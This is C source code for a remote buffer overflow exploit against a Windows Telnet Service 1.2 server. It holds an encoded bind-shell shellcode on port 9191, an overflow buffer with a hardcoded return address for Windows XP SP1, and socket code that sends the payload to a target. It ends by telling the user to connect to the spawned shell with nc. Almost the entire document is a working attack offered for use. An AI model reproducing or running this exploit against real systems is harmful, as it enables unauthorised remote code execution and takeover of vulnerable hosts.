/* ** Windows Telnet Service 1.2 Remote buffer owerflow ** by fiNis > fiNis[at]bk.ru ** for Win & Unix ** */ #include #include #include #include #ifdef WIN32 #include #include #pragma lib #else #include #include #include #include #endif #define VER "0.0.1" unsigned char shellcode[] = // bind shell at 9191 port (484 bytes) "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33" "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C" "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE" "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB" "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77" "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77" "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77" "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77" "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77" "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77" "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77" "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77" "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77" "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB" "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C" "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0" "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77" "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0" "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB" "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5" "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98" "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE" "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77" "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8" "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF" "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90" "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74" "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4" "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94" "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5" "\xD3\x4A\x8C\x88"; long gimmeip(char *hostname); void keepout(); /***************************************************************/ void keepout() { #ifdef WIN32 WSACleanup(); #endif exit(1); } void banner() { printf("\nWindows Telnet Service 1.2(Jordan) remote buffer overflow"); printf("\n exploit by fiNis (fiNis[at]bk.ru), ver:%s\n",VER); printf("-----------------------------------------------------------\n"); } void usage(char *prog) { banner(); printf("Usage: %s [target port]\n", prog); exit(1); } /***************************************************************/ long gimmeip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname); keepout(); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } int main(int argc, char *argv[]) { int sock; char expbuff[1024+500]; char recvbuff[512]; unsigned short tport = 23; unsigned short port = 9191; struct sockaddr_in target; long retaddr = 0x77f9980f; // tested on WinXP (rus) + SP1 int len; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(2,0), &wsadata); #endif if(argc < 2) usage(argv[0]); if(argc > 2) tport = atoi(argv[2]); printf("\n[+] Prepare exploit buffer"); memset(expbuff, 0, sizeof(expbuff)); memset(recvbuff, 0, sizeof(recvbuff)); memset(&expbuff, 0x41, 528); memcpy(&expbuff[512], (unsigned char *) &retaddr, 4); memcpy(&expbuff[528], shellcode, sizeof(shellcode)-1); memset(&target,0x00,sizeof(target)); target.sin_family = AF_INET; target.sin_addr.s_addr = gimmeip(argv[1]); target.sin_port = htons(tport); printf("\n[+] Initialize socket."); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("[x] Error socket. Exiting...\n"); keepout(); } printf("\n[+] Try connecting to Telnet Server at %s:%hu...", argv[1], tport); if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) { perror("\n [x] Couldn't establish connection. Exiting...\n"); keepout(); } printf(" - OK."); //printf("\n Wait for response"); len = recv(sock, recvbuff, sizeof(recvbuff), 0); if(len < 0) { perror("\nError response server"); exit(1); } printf("\n[+] Sending diabolic buffer"); if(send(sock,expbuff,strlen(expbuff),0)==-1) { printf("[-] Sending failed or filtred"); keepout(); } //printf("\n[i]Wait for response"); len = recv(sock, recvbuff, sizeof(recvbuff), 0); if(len < 0) { perror("\nError recv"); exit(1); } printf("\n[+] Now try connect to shell on 9191 port (et:nc -vv target 9191)"); #ifdef WIN32 closesocket(sock); WSACleanup(); #else close(sock); #endif return(0); }

��ŷ��